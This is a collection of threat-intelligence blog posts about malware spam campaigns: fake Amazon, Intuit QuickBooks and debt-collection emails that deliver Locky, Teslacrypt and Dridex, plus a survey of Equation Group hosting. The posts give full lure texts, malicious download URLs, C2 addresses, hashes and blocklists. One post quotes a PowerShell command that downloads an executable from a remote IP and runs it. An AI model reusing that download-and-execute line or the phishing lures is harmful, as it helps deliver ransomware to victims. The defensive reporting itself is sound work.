Malware spam: "Invoice RE-2017-09-21-00xxx" from "Amazon Marketplace"

This fake Amazon spam comes with a malicious attachment:

Subject:       Invoice RE-2017-09-21-00794
From:       "Amazon Marketplace" [yAhbPDAoufvZE@marketplace.amazon.co.uk]
Date:       Thu, September 21, 2017 9:21 am
Priority:       Normal

------------- Begin message -------------

Dear customer,

We want to use this opportunity to first say "Thank you very much for your purchase!"

Attached to this email you will find your invoice.

Kindest of regards,
your Amazon Marketplace

==



[commMgrHmdToken:EVDOOCETFBECA]

------------- End message -------------

For Your Information: To help arbitrate disputes and preserve trust and safety, we
retain all messages buyers and sellers send through Amazon.co.uk. This includes your
response to the message below. For your protection we recommend that you only
communicate with buyers and sellers using this method.

Important: Amazon.co.uk's A-to-z Guarantee only covers third-party purchases paid
for through our Amazon Payments system via our Shopping Cart or 1-Click. Our
Guarantee does not cover any payments that occur off Amazon.co.uk including wire
transfers, money orders, cash, check, or off-site credit card transactions.

We want you to buy with confidence whenever you purchase products on Amazon.co.uk.
Learn more about Safe Online Shopping
(http://www.amazon.co.uk/gp/help/customer/display.html?nodeId=11081621) and our safe
buying guarantee
(http://www.amazon.co.uk/gp/help/customer/display.html?nodeId=3149571).



[commMgrTok:EVDOOCETFBECA]

Attached is a .7z archive file with a name that matches the one quoted in the subject line. So far I have seen just two versions of this, each containing a malicious script (sample here and here). These scripts have a detection rate of about 13/58 and they can been seen attempted to download a component from:

ahlbrandt.eu/IUGiwe8?
fulcar.info/p66/IUGiwe8
accuflowfloors.com/IUGiwe8?
aetozi.gr/IUGiwe8?
agricom.it/IUGiwe8?

An executable is dropped (Locky ransomware) with a detection rate of 18/64. Although Hybrid Analysis [1] [2] clearly shows the ransomware, no C2s are currently available (it turns out there aren't any).

UPDATE - additional download locations:
81552.com/IUGiwe8
adr-werbetechnik.de/IUGiwe8
afmance.it/IUGiwe8
afradem.com/IUGiwe8
agriturismobellaria.net/IUGiwe8
agro-kerler.de/IUGiwe8
moonmusic.com.au/IUGiwe8

Malware spam: "Your Amazon.com order has dispatched" leads to Locky

This summary is not available. Please click here to view the post.

Malware spam: "Credit details ID: 87320357" leads to Teslacrypt

So many Teslacrypt campaigns, so little time... I've had to rely on third party analysis on this particular one (thank you!)

From:    Ladonna feather
Date:    14 March 2016 at 14:50
Subject:    Credit details ID: 87320357

Your credit card has been billed for $785,97. For the details about this transaction, please see the ID: 87320357-87320357 transaction report attached.

NOTE: This is the automatically generated message. Please, do not reply. 

Send names, references and attachment names vary. The malicious scripts in the attachment attempt to download from:

giveitallhereqq.com/69.exe?1
washitallawayff.com/69.exe?1
giveitallhereqq.com/80.exe?1
washitallawayff.com/80.exe?1

This is Teslacrypt ransomware with VirusTotal detection rates of 1/57 [1] [2]. The malware attempts to phone home to:

198.1.95.93/~deveconomytravel/cache/binstr.php
kel52.com/wp-content/plugins/ajax-admin/binstr.php
myredhour.com/blog//wp-content/themes/berlinproof/binstr.php
controlfreaknetworks.com/dev/wp-content/uploads/2015/07/binstr.php
sappmtraining.com/wp-includes/theme-compat/wcspng.php
controlfreaknetworks.com/dev/wp-content/uploads/2015/07/wcspng.php

The download locations for the executable files can all be considered as malicious:

54.212.162.6 (Amazon AWS, US)
212.119.87.77 (Middle East Internet Company Limited, Saudi Arabia)
78.135.108.94 (Sadecehosting, Turkey)
178.18.99.23 (Maginfo JSC, Russia)
31.47.179.11 (Baikal TransTeleCom, Russia)
31.134.39.52 (IRONNET Ltd, Russia)
119.247.218.165 (Hong Kong Broadband Network Ltd, Hong Kong)
113.252.180.39 (Hutchison Global Communications, Hong Kong)
37.115.24.106 (Kyivstar GSM, Ukraine)
5.248.2.179 (Kyivstar GSM, Ukraine)
193.169.134.215 (SDS-Vostok Ltd, Russia)
5.166.207.194 (ER-Telecom Holding, Russia)
46.172.219.246 (Krym Infostroy Ltd, Ukraine)

Out of these, only the first three (for giveitallhereqq.com) appear to be static IPs, the others (for washitallawayff.com) are dynamic and are likely part of a botnet, so blocking the domain might be better.

Recommended blocklist:
54.212.162.6
212.119.87.77
78.135.108.94
washitallawayff.com

Malware spam: "Debt #85533 , Customer Case Nr.: 878" leads to Teslacrypt

The details in these spam messages vary, with different reference numbers, sender names and dollar amounts. They all have malicious attachments, however.

From:    Lamar drury
Date:    13 March 2016 at 18:43
Subject:    Debt #85533 , Customer Case Nr.: 878

Dear Customer,

Despite our constant reminders, we would like to note that the mentioned debt #85533 for $826,87 is still overdue for payment.

We would appreciate your cooperation on this case and ask you to make the payment as soon as possible.

Unless the full payment is received by April 1st, 2016 this case will be transferred to the debt collection agency, will seriously damage your credit rating.
Please, find the attachment enclosed to the letter below.

We hope on your understanding.

Kind regards,
Finance Department
Lamar drury
878 N Davis St, Jacksonville,
FL 85533
Phone nr: 464-182-2340 

Attached is a ZIP file, that in the samples I saw starts with:

• doc_scan_
• money_
• payment_details_
• payment_
• warning_
• see_it_
• payment_scan_
• finance_
• warning_letter_
• report_
• transaction_
• details_
• incorrect_operation_
• confirmation_
• document_
• problem_
• financial_judgement_

 ..plus a random number. Inside are one to four malicious .js scripts, named in the following format:

• details_
• mail_
• post_
• Post_Parcel_Case_id00-
• Post_Parcel_Confirmation_id00-
• Post_Parcel_Label_id00-
• Post_Shipment_Confirmation_id00-
• Post_Shipment_Label_id00-
• Post_Tracking_Case_id00-
• Post_Tracking_Confirmation_id00-
• Post_Tracking_Label_id00-

The first three have a random string, the ones beginning with "Post" are followed by a random number and a #.  There are at least 22 unique scripts with the following MD5s:

05A44DF4418EA3F133A3708D4D829DC7
84A57069907726FFADE1DE7DDF6E34CD
6F9726C410B3FCE2FC1EAF75C5015BFC
97D6643DE12E4430CD11412D7917C8B2
ADB1CF98CD632B0E55358C045114ED6A
732314E639426E42B9342B1470798E02
AC2D6B033C943AF864F6A6E2A143E0CD
EA9BE11F3267D14CDF3A88786E2D69C8
E831A7247D30F9EB406A3F5AFCB63EDE
D5B74B58E9971BE84AA83B2E1D46B414
1A177FAF482FC924D2439F4111428D9F
0FB3CD12FB2BF4AC7ABB909383E2EEB8
A810DCD3DE5DA723940D3C44075D3314
F1B4DF8D16F81FFC543E252594DF5C03
3FE0BD9E25B3D0A36A898BE6E579780E
060990306E189A6022E2CCB041912588
6F963C39333F751D097D8DB8A2EEF525
DBF2B52926B5925E382BCF4024E5C8F7
4193D7D43CA5981EDB6E790ED568E5F3
AED7397352E43C0E2F0281AA2F4AACB2
ED8919841E31422C6318978BDAE5612B
C6D52DA9375DA4C33776D68407CC9B0D

These appear [1] [2] to download a malicious binary from one of the following locations:

ohelloguyff.com/70.exe
ohelloguyzzqq.com/85.exe?1

Of these, only the 85.exe download is working for me at the moment which is Teslacrypt ransomware. This has a detection rate of just 1/56.

The download locations have the following IP addresses:

185.35.108.109 (DA International Group Ltd, Bulgaria)
204.44.102.164 (Quadranet Inc, US)
54.212.162.6 (Amazon AWS, US)
192.210.144.130 (Hudson Valley Host / Colocrossing, US)
212.119.87.77 (Middle East Internet Company Limited, Saudi Arabia)
78.135.108.94 (Sadecehosting, Turkey)

Those IP addresses can be considered as evil, and they also host the following sites:

returnyourfiless.ru
pren874bwsdbmbwe.returnyourfiless.ru
spannflow.com
nnrtsdf34dsjhb23rsdf.spannflow.com
howareyouqq.com
ohelloguyqq.com
bonjovijonqq.com
witchbehereqq.com
invoiceholderqq.com
joecockerhereqq.com
fe3xr7qvyc.joecockerhereqq.com
lenovomaybenotqq.com
hellomississmithqq.com
thisisyourchangeqq.com
kvs5d8t3uc.thisisyourchangeqq.com
itsyourtimeqq.su
blizzbauta.com
q4bfgr7bdn4nrfsnmdf.blizzbauta.com
yesitisqqq.com
thisisitsqq.com
blablaworldqq.com
fromjamaicaqq.com
hellomydearqq.com
arendroukysdqq.com
itisverygoodqq.com
goonwithmazerqq.com
helloyoungmanqq.com
mafianeedsyouqq.com
mafiawantsyouqq.com
soclosebutyetqq.com
isthereanybodyqq.com
lenovowantsyouqq.com
ogxl0vcjum.thisisyourchangeqq.com
gutentagmeinliebeqq.com
hellomisterbiznesqq.com
ohelloguyff.com
ohelloguymyff.com
joecockerhereff.com
howisittomorrowff.com
thunicodenamespace.com
wioutpudforcontents.com
idendnsletbarcamednstwo.com
leadhoffmanclassapplico.com
insensitivityinterpreted.com
placegrantthenoticesmust.com
dns1.beforeyougogg.net
dns1.ohimyfriendff.net
dns2.ohimyfriendff.net
dns1.kaktotakvot.pw
dns2.martuswalmart.pw
dns2.beforeyougogg.net
dns2.microtexreglyt.net
microtexregyts.net
gdemoidomaine.info
daimoidomainemne.info
mydomainebizness.info


Recommended blocklist:
185.35.108.109
204.44.102.164
54.212.162.6
192.210.144.130
212.119.87.77
78.135.108.94

Malware spam: "Urgent Notice # 78815053" leads to Teslacrypt

This spam comes from random senders, and has random references, dollar amounts and attachment names:

From:    Donnie emily
Date:    12 March 2016 at 14:01
Subject:    Urgent Notice # 78815053

Dear Customer!

According to our data you owe our company a sum of $452,49. There are records saying that you have ordered goods in a total amount of $ 452,49 in the third quarter of 2015.

Invoice has been paid only partially. The unpaid invoice #78815053 is enclosed below for your revision.

We are writing to you, hoping for understanding and in anticipation of the early repayment of debt.

Please check out the file and do not hesitate to pay off the debt.

Otherwise we will have to start a legal action against you.

Regards,
Donnie emily
758 N Davis St, Jacksonville,
FL 17323
Phone nr: 026-762-3482 

Attached is a randomly-named ZIP file, in the sample I have seen they begin with:

• letter_
• confirm_
• access_
• unconfirmed_operation_
• operation_
• details_

..plus a random number. There may be other formats. Inside is a malicious script beginning with:

• details_
• post_
• mail_

..plus a random string of characters. I have seen six versions of this script, I do not know how many there are in total. VirusTotal results show detection rates between 4 and 7 out of 57 [1] [2] [3] [4] [5] [6] and automated analysis tools [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] show the script attempting to download a binary from:

bonjovijonqq.com/69.exe?1
bonjovijonqq.com/80.exe?1

This is Teslacrypt ransomware, although it is possible that some variants of this message may drop Locky. Both these binaries are slightly different (VirusTotal results [19] [20]) and they appear to phone home to:

vtechshop.net/wcspng.php
sappmtraining.com/wp-includes/theme-compat/wcspng.php
shirongfeng.cn/images/lurd/wcspng.php

It also attempts to contact the domain multibrandphone.com but that was not resolving at the time of analysis. It also appears to phone home to:

31.184.196.78 (Petersburg Internet Network Ltd, Russia)
91.234.32.192 (FOP Sedinkin Olexandr Valeriyovuch, Russia)

The domain bonjovijonqq.com is purely malicious and is hosted on the following IPs:

192.210.144.130 (Hudson Valley Host  / Colocrossing, US)
54.212.162.6 (Amazon AWS, US)
212.119.87.77 (Middle East Internet Company Limited, Saudi Arabia)
78.135.108.94 (Sadecehosting, Turkey)

The following malicious domains are also on the same servers:

nnrtsdf34dsjhb23rsdf.spannflow.com
bonjovijonqq.com
returnyourfiless.ru
pren874bwsdbmbwe.returnyourfiless.ru
spannflow.com
howareyouqq.com
witchbehereqq.com
invoiceholderqq.com
joecockerhereqq.com
fe3xr7qvyc.joecockerhereqq.com
lenovomaybenotqq.com
hellomississmithqq.com
thisisyourchangeqq.com
kvs5d8t3uc.thisisyourchangeqq.com
itsyourtimeqq.su
blizzbauta.com
q4bfgr7bdn4nrfsnmdf.blizzbauta.com
yesitisqqq.com
thisisitsqq.com
blablaworldqq.com
fromjamaicaqq.com
hellomydearqq.com
arendroukysdqq.com
itisverygoodqq.com
goonwithmazerqq.com
helloyoungmanqq.com
mafianeedsyouqq.com
mafiawantsyouqq.com
soclosebutyetqq.com
isthereanybodyqq.com
lenovowantsyouqq.com
ogxl0vcjum.thisisyourchangeqq.com
gutentagmeinliebeqq.com
hellomisterbiznesqq.com

In fact, there are a vast number of malicious IPs and servers in this cluster. I simply haven't had time to look at them all yet.

Recommended blocklist:
192.210.144.130
54.212.162.6
212.119.87.77
78.135.108.94
31.184.196.78
91.234.32.192
multibrandphone.com
sappmtraining.com
shirongfeng.cn
vtechshop.net

Malware spam: "INTUIT QB" / "QUICKBOOKS ONLINE [qbservices@customersupport.intuit.com]" leads to ransomware

This fake Intuit QuickBooks spam leads to malware:

From:    QUICKBOOKS ONLINE [qbservices@customersupport.intuit.com]
Date:    30 November 2015 at 10:42
Subject:    INTUIT QB


As of November 5th, 2015, we will be updating the browsers we support. We encourage you to upgrade to the latest version for the best online experience. Please proceed the following link, download and install the security update for all supported browsers to be on top with INTUIT online security!

InTuIT. | simplify the business of life

© 2015 Intuit Inc. All rights reserved. Intuit and QuickBooks are registered trademarks of Intuit Inc. Terms and conditions, features, support, pricing, and service options subject to change without notice. 

The spam is almost identical to this one which led to Nymaim ransomware.

In this particular spam, the email went to a landing page at updates.intuitdataserver-1.com/sessionid-7ec395d0628d6799669584f04027c7f6 which then attempts to download a fake Firefox update. 

This executable has a VirusTotal detection rate of 3/55, the MD5 is 592899e0eb3c06fb9fda59d03e4b5b53. The Hybrid Analysis report shows the malware attempting to POST to mlewipzrm.in which is multihomed on:

89.163.249.75 (myLoc managed IT AG, Germany)
188.209.52.228 (BlazingFast LLC, Ukraine / NForce Entertainment, Romania)
95.173.164.212 (Netinternet Bilgisayar ve Telekomunikasyon San. ve Tic. Ltd. Sti., Turkey)

The nameservers for mlewipzrm.in are NS1.REBELLECLUB.NET and NS2.REBELLECLUB.NET which are hosted on the following IPs:

210.110.198.10 (KISTI, Korea)
52.61.88.21 (Amazon AWS, US)

These nameservers support the following malicious domains:

exstiosgen.com
ecestioneng.com
densetsystem.com
deseondefend.com
xonstensetsat.com
dledisysteming.com
thecertisendes.com
georgino.net
tangsburan.net
rebelleclub.net
helpagregator.net

The download location uses a pair of nameservers, NS1.MOMEDEFER.PW and NS1.PRIZEBROCK.PW. If we factor in the NS2 servers as well, we get a set of malicious IPs:

5.135.237.209 (OVH, France)
196.52.21.11 (LogicWeb, US / South Africa)
75.127.2.116 (Foroquimica SL / ColoCrossing, US)

These nameservers support the following malicious domains:

browsersecurityupdates.com
intuit-browsersecurity.com
intuit-browserupdate.com
intuitdataserver.com
intuitdataserver1.com
intuitdataserver-1.com
intuitinstruments.com
intuit-security.com
intuitsecuritycenter.com
intuitsecurityupdates.com
intuit-securityupdates.com
intuit-updates.com
intuitupdates-1.com
security-center1.com
securitycentral1.com
securitycentral-1.com
securityserver-2.com
securityupdateserver-1.com
updates-1.com
updateserver-1.com

As far as I can tell, these domains are hosted on the following IPs:

52.91.28.199 (Amazon AWS, US)
213.238.170.217 (Eksen Bilisim, Turkey)
75.127.2.116 (Foroquimica SL / ColoCrossing, US)

I recommend that you block the following IPs and/or domains:

52.91.28.199
213.238.170.217
5.135.237.209
196.52.21.11
75.127.2.116
210.110.198.10
52.61.88.21
89.163.249.75
188.209.52.228
95.173.164.212
mlewipzrm.in
exstiosgen.com
ecestioneng.com
densetsystem.com
deseondefend.com
xonstensetsat.com
dledisysteming.com
thecertisendes.com
georgino.net
tangsburan.net
rebelleclub.net
helpagregator.net
browsersecurityupdates.com
intuit-browsersecurity.com
intuit-browserupdate.com
intuitdataserver.com
intuitdataserver1.com
intuitdataserver-1.com
intuitinstruments.com
intuit-security.com
intuitsecuritycenter.com
intuitsecurityupdates.com
intuit-securityupdates.com
intuit-updates.com
intuitupdates-1.com
security-center1.com
securitycentral1.com
securitycentral-1.com
securityserver-2.com
securityupdateserver-1.com
updates-1.com
updateserver-1.com
momedefer.pw
prizebrock.pw

Malware spam: "Refund on order 204-2374256-3787503" / "Amazon.co.uk [payments-messages@amazon.co.uk]"

This fake Amazon spam comes with a malicious attachment:

From:    Amazon.co.uk [payments-messages@amazon.co.uk]
Reply-To:    "Amazon.co.uk" [payments-messages@amazon.co.uk]
Date:    23 April 2015 at 09:58
Subject:    Refund on order 204-2374256-3787503

Dear Customer,

Greetings from Amazon.co.uk.

We are writing to confirm that we are processing your refund in the amount of £4.89 for your
Order 204-2374256-3787503.

This amount has been credited to your payment method and will appear when your bank has processed it.

This refund is for the following item(s):

Item: Beautiful Bitch
Quantity: 1
ASIN: 1476754144
Reason for refund: Customer return

The following is the breakdown of your refund for this item:

Item Refund: £4.89

Your refund is being credited as follows:

GC: £4.89

These amounts will be returned to your payment methods within 5 business days.

The amount credited to your Gift Card balance should be automatically applied to your next eligible
order on our website.

Have an issue with your refund, or a question about our refund policy?
Visit our Help section for more information:

http://www.amazon.co.uk/gp/help/customer/display.html?nodeId=1161010

Please note: The credit note for this transaction is attached to this e-mail and to open, you will
need Adobe Reader. If you do not have an Adobe Reader, please visit the following link to download
it: http://get.adobe.com/reader/

This credit note is the detailed breakdown of the refund showing the item(s), delivery costs and
associated VAT for each item. This credit note is largely applicable to business customers who
should retain it for accounting purposes. It’s not possible to redeem or use the credit
note number from this credit note towards an order. Visit our Help pages for more information on
refunds.

Thank you for shopping at Amazon.co.uk.

Sincerely,

Amazon.co.uk Customer Service
http://www.amazon.co.uk


Note: this e-mail was sent from a notification-only e-mail address that cannot accept incoming e-mail.
Please do not reply to this message.

An advanced electronic signature has been attached to this electronic credit note. To add the certificate
as a trusted certificate, please follow these instructions:
1. Click on the 'Signature Panel' in the upper right corner
2. Expand the drop-down in the newly opened Signatures menu, expand the 'Signature Details' drop-down and
   click 'Certificate Details'
3. In the Certificate Viewer box click on the 'Trust' tab, click 'Add To Trusted Certificates' and then
   click OK
4. In the Import Contact Settings box, ensure that 'Use this certificate as a trusted root' is selected,
   click OK, and then click OK again

Attached is a file 204-2374256-3787503-credit-note.doc which probably comes in several versions, however the one I analysed had a detection rate of 4/57 and contained this malicious macro [pastebin] which downloads a component from:

http://qube.co.il/42/335.exe

..which is saved as %TEMP%\pierre3.exe and which currently has a detection rate of 3/42 (42?). Automated analysis tools [1] [2] [3] [4] indicate that it calls out to the following IPs:

185.12.95.191 (RuWeb CJSC, Russia)
87.236.215.151 (OneGbits, Lithuania)
94.23.171.198 (OVH, Czech Republic)
185.35.77.250 (Corgi Tech, UK)
149.154.64.70 (TheFirst-RU, Russia)

The Malwr report says that it drops a Dridex DLL which currently has a detection rate of 17/56.

Recommended blocklist:
185.12.95.191
87.236.215.151
94.23.171.198
185.35.77.250
149.154.64.70

MD5s:
e52a8d15ee08d7f8b4efca1b16daaefb
57b54e248588af284871c2076f05651c
ca5c5b79ce16d888ba2a6747b9d033d3

An analysis of reported Equation Group IP ranges and domains

There has been a lot of buzz this morning about "The Equation Group", a possible state actor involved in placing malware on hard disks [1] [2] [3] [4].

Securelist (in conjunction with Kaspersky) published a list of domains and IPs to do with this malware, but with very little information about where they were hosted. After all, if they a hosted in a shed next to the bus station in Tiraspol or some underground complex buried under Wutong Mountain, then it's a rather different proposition from some secretive organisation in Washington DC.

Securelist post a number of hardcoded IPs as well as some domain names. Kaspersky have sinkholed some of the domains, and I can see one other active sinkhole. At least one of the domains is parked. Some of the domains look like they are not in use.

The data I collected can be found here, but before you use any of it, I will explain in more detail so you can use it prudently.

There are several web hosts and networks involved, all over the world. Some seem to have a higher certainty of involvement than others. In most cases, the Equation Group have rented a bunch of servers with contiguous IP addresses (I call this the "Equation Range") which is the one that I recommend you monitor. Some web hosts have other suspect IP addresses in the same neighbourhood, but in order to keep things simple I am not going into that.

(Updated 18/2/15 to remove an OpenDNS sinkhole and add 41.222.35.70)

FLAG Telecom / Reliance Globalcom

62.216.152.64/28
80.77.2.160/27
80.77.4.0/26

Allegedly a partner of the NSA and GCHQ, these IP addresses appear to be in the UK, US and Egypt (I would doubt the accuracy of the WHOIS data for the last one). In addition to apparently hardcoded IPs, they also host:

team4heat.net
forgotten-deals.com
phoneysoap.com
cigape.net
mimicrice.com
charmedno1.com
functional-business.com
rehabretie.com
advancing-technology.com
crisptic01.net
tropiccritics.com
cribdare2no.com
following-technology.com
teatac4bath.com

Verizon

194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
202.95.84.32/27
210.81.52.96/27
212.177.108.192/27

Another company with a long history with the NSA, these Verizon IPs are all located outside the United States, specfically the Netherlands, Singaporre, Japana and Italy. In addition to hardcoded IPs, they are hosting:

honarkhaneh.net
meevehdar.com
parskabab.com
ad-noise.net
ad-void.com
aynachatsrv.com
damavandkuh.com
fnlpic.com
monster-ads.net
nowruzbakher.com
sherkhundi.com
quickupdateserv.com
goodbizez.com
www.dt1blog.com
www.forboringbusinesses.com
timelywebsitehostesses.com
technicads.com
darakht.com
ghalibaft.com
adservicestats.com
downloadmpplayer.com
honarkhabar.com
techsupportpwr.com
webbizwild.com
zhalehziba.com

Global Telecom & Technology Americas Inc. / Cogent / PSInet

149.12.71.0/26

This Cogent customer has at least four different IPs hosting Equation Group servers. The following domains are hosted:

avidnewssource.com
rubi4edit.com
listennewsnetwork.com
unite3tubes.com

Colombia: Alfan Empaques Flexibles S.A. / Columbus Networks / IFX Networks / Terremark

64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
190.60.202.0/28
190.60.202.0/28

The relationship between the US and Colombia is difficult, with the former spying on the latter extensively. Why there should be a cluster of servers in Colombia connected with this is a mystery. In addition to hardcoded IPs, the following domains are hosted in Colombia:

selective-business.com
technicalconsumerreports.com
technicaldigitalreporting.com
technology-revealed.com
melding-technology.com

Czech Republic: Master Internet / IT-PRO / 4D Praha

81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27

A group of three internet companies (possibly using the same infrastructure) also appear to be involved. All these IPs appear to be in the city of Brno, which is also home to the Czech National Cyber Security Center. Coincidence? The following domains can be found on Czech IPs in addition to hardcoded addresses:

islamicmarketing.net
noticiasftpsrv.com
coffeehausblog.com
platads.com
nickleplatedads.com
arabtechmessenger.net

Spain: Terremark / GTT Global Telecom

84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28


Terremark also provide hosting services for Equation in Colmbia, and of course Spain is a long-time ally of the United States and United Kingdom. Web sites hosted:

businessedgeadvance.com
business-made-fun.com
rampagegramar.com
unwashedsound.com
businessdealsblog.com
industry-deals.com
itemagic.net
posed2shade.com
slayinglance.com
rubiccrum.com
rubriccrumb.com

Netherlands: Tripartz-Atrato / IX Reach / Claranet / FiberRing

212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109

In addition to Verizon, four other Netherlands companies are hosting Equation Group servers. The Netherlands is another long-time ally of the US and UK.

arm2pie.com
businessdirectnessource.com
housedman.com
taking-technology.com
micraamber.net
charging-technology.com
brittlefilet.com
dowelsobject.com
speedynewsclips.com

Malaysia: Piradius NET

124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29

Often appearing to be a "go-to" company if you want to set up a Black Hat reseller, these domains and IPs look like they have been picked up as part of a commercial offering.

roshanavar.com
adsbizsimple.com
bazandegan.com
amazinggreentechshop.com
foroushi.net
technicserv.com
afkarehroshan.com
thesuperdeliciousnews.com
sherkatkonandeh.com
mashinkhabar.com

Other ranges and hosts

• RACSA in Costa Rica hosts customerscreensavers.com and xlivehost.com on 196.40.84.8/29.
• EasySpeed in Denmark hosts  quik-serv.com and goldadpremium.com on 82.103.134.48/30.
• Cyber Cast International in Panama hosts havakhosh.com and toofanshadid.com on 200.115.174.254.
• EM Technologies in Panama hosts technicupdate.com and rapidlyserv.com on 201.218.238.128/26.
• INET in Thailand hosts globalnetworkanalys.com on 203.150.231.49 with an apparently hardcoded IP of 203.150.231.73 in use as well.
• American Internet Services hosts suddenplot.com on 207.158.58.102.
• GoDaddy hosts serv-load.com and wangluoruanjian.com on 97.74.104.208.
• Quadranet / GZ Systems hosts fliteilex.com plus some other questionable domains on 67.215.237.104/29.
• Vegas Linkup LLC hosts standardsandpraiserepurpose.com on 209.59.42.97.
• Vox Telecom in South Africa hosts mysaltychocolateballs.com on 41.222.35.70 having previously hosted forboringbusinesses.com.

In all the following network blocks and IPs appear to be hosting servers connected to the Equation Group:

64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
69.42.114.96/28
196.40.84.8/29
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
82.103.134.48/30
80.77.2.160/27
84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
212.177.108.192/27
210.81.52.96/27
124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29
212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
200.115.174.254
201.218.238.128/26
202.95.84.32/27
203.150.231.49
203.150.231.73
62.216.152.64/28
207.158.58.102
149.12.71.0/26
80.77.4.0/26
97.74.104.208
67.215.237.104/29
209.59.42.97
41.222.35.70

I recommend that you look at the data before you do drastic things with these IP ranges.

Now, I don't know for certain that this malware is a government actor, but the IP address indicate that whoever it is has a relationship with these companies (especially Verizon). That certainly feels like a state actor to me..

Malware spam: "Amazon Marketplace [delivery@amazon.uk]" / "Remittance [Report ID:34355-6014742]"

This email with no body text comes with a malicious Excel attachment:

From:    Amazon Marketplace [delivery@amazon.uk]
Date:    13 February 2015 at 14:34
Subject:    RE: Remittance [Report ID:34355-6014742]

I have seen just a single sample of this with an attachment D87278F02E.XLS which has a zero detection rate at VirusTotal. This Excel spreadsheet contains this malicious Excel macro [pastebin] which attempts to execute the following command:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.217/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';

The downloaded file dhoei.exe is exactly the same as used in this spam run.

"Your Amazon.co.uk order has dispatched" spam has a malicious DOC attachment

This fake Amazon email comes with a malicious Word document attached:

From:     Amazon.co.uk [auto-shipping@amazon.co.uk]
Reply-To:     "auto-shipping@amazon.co.uk" [auto-shipping@amazon.co.uk]
Date:     31 October 2014 09:12
Subject:     Your Amazon.co.uk order has dispatched (#203-2083868-0173124)

Dear Customer,

Greetings from Amazon.co.uk,

We are writing to let you know that the following item has been sent using  Royal Mail.

For more information about delivery estimates and any open orders, please visit: http://www.amazon.co.uk/your-account

Your order #203-2083868-0173124 (received October 30, 2014)


Your right to cancel:
At Amazon.co.uk we want you to be delighted every time you shop with us.  O=
ccasionally though, we know you may want to return items. Read more about o=
ur Returns Policy at:  http://www.amazon.co.uk/returns-policy/

Further, under the United Kingdom's Distance Selling Regulations, you have =
the right to cancel the contract for the purchase of any of these items wit=
hin a period of 7 working days, beginning with the day after the day on whi=
ch the item is delivered. This applies to all of our products. However, we =
regret that we cannot accept cancellations of contracts for the purchase of=
 video, DVD, audio, video games and software products where the item has be=
en unsealed. Please note that we are unable to accept cancellation of, or r=
eturns for, digital items once downloading has commenced. Otherwise, we can=
 accept returns of complete product, which is unused and in an "as new" con=
dition.

Our Returns Support Centre will guide you through our Returns Policy and, w=
here relevant, provide you with a printable personalised return label.  Ple=
ase go to http://www.amazon.co.uk/returns-support to use our Returns Suppor=
t Centre.

To cancel this contract, please pack the relevant item securely, attach you=
r personalised return label and send it to us with the delivery slip so tha=
t we receive it within 7 working days after the day of the date that the it=
em was delivered to you or, in the case of large items delivered by our spe=
cialist couriers, contact Amazon.co.uk customer services using the link bel=
ow within 7 working days after the date that the item was delivered to you =
to discuss the return.

https://www.amazon.co.uk/gp/css/returns/homepage.html

For your protection, where you are returning an item to us, we recommend th=
at you use a recorded-delivery service. Please note that you will be respon=
sible for the costs of returning the goods to us unless we delivered the it=
em to you in error or the item is faulty. If we do not receive the item bac=
k from you, we may arrange for collection of the item from your residence a=
t your cost. You should be aware that, once we begin the delivery process, =
you will not be able to cancel any contract you have with us for services c=
arried out by us (e.g. gift wrapping).

Please also note that you will be responsible for the costs of collection i=
n the event that our specialist courier service collect a large item from y=
ou to return to us.

As soon as we receive notice of your cancellation of this order, we will re=
fund the relevant part of the purchase price for that item.=20

Should you have any questions, feel free to visit our online Help Desk at:=
=20
http://www.amazon.co.uk/help

If you've explored the above links but still need to get in touch with us, =
you will find more contact details at the online Help Desk.=20

Note: this e-mail was sent from a notification-only e-mail address that can=
not accept incoming e-mail. Please do not reply to this message.=20

Thank you for shopping at Amazon.co.uk

-------------------------------------------------
Amazon EU S.=C3=A0.r.L.
c/o Marston Gate
Ridgmont, BEDFORD MK43 0XP
United Kingdom
-------------------------------------------------

The Word document contains a malicious macro [pastebin] but is currently undetected at VirusTotal (the Malwr report doesn't say much but is here).

The macro then downloads http://ctmail.me/1.exe and executes it. This malicious binary has a a detection rate of 4/52, and according to the Malwr report it contacts the following URLs:

http://84.40.9.34/Xl37yRuH5LS6Nqk/~yNk%2C2IO.1Jw9/wm@OF0fR%2BPvics%2CR8H/br~%262O%2Cu3k%3FI~i7%2D
http://213.143.97.18/wPfG2lK%24F/ET0~4%3De$4UsZiwg@/fJ_6E%24
http://213.143.97.18/iXxTuXI@6s1/NzJ%2CbsSmuQsl/n3
http://213.143.97.18/Yug4oQ83$~J%249BH/y93%266@@L3%3DL%26b88UmM/%24%24
http://213.143.97.18/Pizz.%2D%2CksZ@1&T/bYNr%2B9%2CK%2D1i%2BCGqLi%2Bw
http://213.143.97.18/vh/esx5rBQsLNKRJ%7E+$%2C_5KQk%2BeQpaGr/&4b0ERginAuG/zx$.G6K%3F
http://213.143.97.18/sxvxyZOihv%2C=@3v/%2BSb@9E9blzBnL7k0~TGg.OGq51%2BE5/&wru.x/%24

84.40.9.34 is Hostway in Belgium, 213.143.97.18 is Wien Energie, Austria. The malware also downloads a DLL as 2.tmp which has a detection rate of 3/54.

Recommended blocklist 1:
213.143.97.18
84.40.9.34
ctmail.me

UPDATE 1 - 2014-11-03

A very similar email is doing the rounds this morning with a different version of the attachment (called ORDER-203-2083868-0173124.doc) which has a VirusTotal detection rate of 0/54 and contains this malicious macro [pastebin]. This downloads a file from http://hilfecenter-harz.de/1.exe which also has zero detections at VirusTotal. According the the Malwr report this binary connects to the following URLs:

